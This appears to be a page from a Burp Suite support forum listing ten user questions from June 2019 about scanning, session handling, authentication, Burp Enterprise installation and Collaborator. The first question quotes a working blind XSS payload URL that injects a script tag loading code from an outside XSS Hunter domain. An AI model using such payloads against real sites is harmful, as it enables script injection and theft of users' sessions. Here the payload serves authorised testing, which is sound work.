How Do I?

Make a new post

  • Blind XSS attacks register on XssHunter Site but not when repeated in Intruder.

    Hello, I am using a blind XSS payload using XSS hunter (https://xsshunter.com). When I enter the payload manually into my test site: http://xss.in-secure.org/test.php?name=%22%3E%3Cscript%20src=https://insecureorg.xss.ht%3E%3C/script%3E It will register as received or fired on Xss Hunter's website. When I do the same attack using Burp Intruder, it does not show up on their site. ...

    1 Agent Answer    0 Community Answer
    Jun 19, 2019 08:57PM UTC
  • Scan Targets behind CAS

    Hi, I want to run the scanner on a target that is behind CAS. How do I setup authentication for this scenario? Thank you Anup

    1 Agent Answer    0 Community Answer
    Jun 19, 2019 05:58PM UTC
  • Replace expired access token in scanner request headers with the valid access token all at once

    Hi Background : I am trying to scan our website using Burp scanner. I am able to configure session handling rules (https://support.portswigger.net/customer/portal/articles/2363088-configuring-burp-s-session-handling-rules). I have used Burp's extender and python script to successfully replace expired access tokens of the current request (https://www.foregenix.com/blog/testing-problematic-a...

    1 Agent Answer    0 Community Answer
    Jun 18, 2019 11:36PM UTC
  • Burp Headless Passive Scanning

    Hi, new to Burp. I'm looking for a way to passively scan HTTP responses from a server to see if there are any vulnerabilities while burp is running headless, but not actively scan. I've found a few "headless" extensions, like https://github.com/NetsOSS/headless-burp/, but it seems that it is centered around active scanning (have to specify target scope/site and let it ru...

    2 Agent Answers    1 Community Answer
    Jun 18, 2019 09:59PM UTC
  • Interpreting path info in "strict transport security not enforced" issues

    Hi, In "target"->"site map"->"Issues" tab, I sometimes see reported issues labelled "Strict transport security not enforced" with a path set to "/", but when the request is shown, the path is actually something else. e.g. in the "issues" panel: ! Strict Transport Security not enforced [1] --! / --! /api/ --! /api/getObj...

    1 Agent Answer    1 Community Answer
    Jun 18, 2019 12:45PM UTC
  • Burp Enterprise: Failed to initialize database

    Hi, I'm trying to install Burp Enterprise on an already configured database following the documentation here: https://portswigger.net/burp/documentation/enterprise/getting-started/installation#database-setup However, after I configure the database the installation ends with the following. Initializing database ... Failed to initialize database Finishing installation ... No error...

    1 Agent Answer    1 Community Answer
    Jun 18, 2019 10:40AM UTC
  • I can't see a POST Requet in Proxy Intercept menu but it is in the HTTP history menu

    I should find out a specific POST REQUEST in Proxy Intercept menu.. I couldn't find this in the menu but it was in HTTP HISTORY menu.. How can I find this in intercept menu..?

    1 Agent Answer    0 Community Answer
    Jun 17, 2019 03:38PM UTC
  • asterisk platform authentication

    hi, I need to put entry in platform authentication (user options-connections) for some domains. When I use a.foo.com, burp still asks another entry for b.foo.com. I want to use one entry for all *.foo.com. * doesn't seem to work (like it does in upstream proxy settings) How can I do that?

    2 Agent Answers    1 Community Answer
    Jun 17, 2019 01:48PM UTC
  • Burp collaborator server domain

    hello, I have a looked at the documentation but could'nt find any reference. What is the domain name of the collaborator server that burp checks the interactions (when I click poll button)? I need to take a firewall exception from my company to let my burp installation check the interactions. https://portswigger.net/blog/introducing-burp-collaborator regards

    1 Agent Answer    1 Community Answer
    Jun 17, 2019 01:04PM UTC
  • Burp Scan plugin Post Build Actions Report

    Hello, We are using 'Burp Scan' plugin to integrate the Burp Enterprise with Jenkins. In the 'Post-build Actions' we are not able to find any options that would show the execution report that we can share with stake holders. Could you please suggest any option for this. Thanks, Govind

    1 Agent Answer    0 Community Answer
    Jun 17, 2019 12:14PM UTC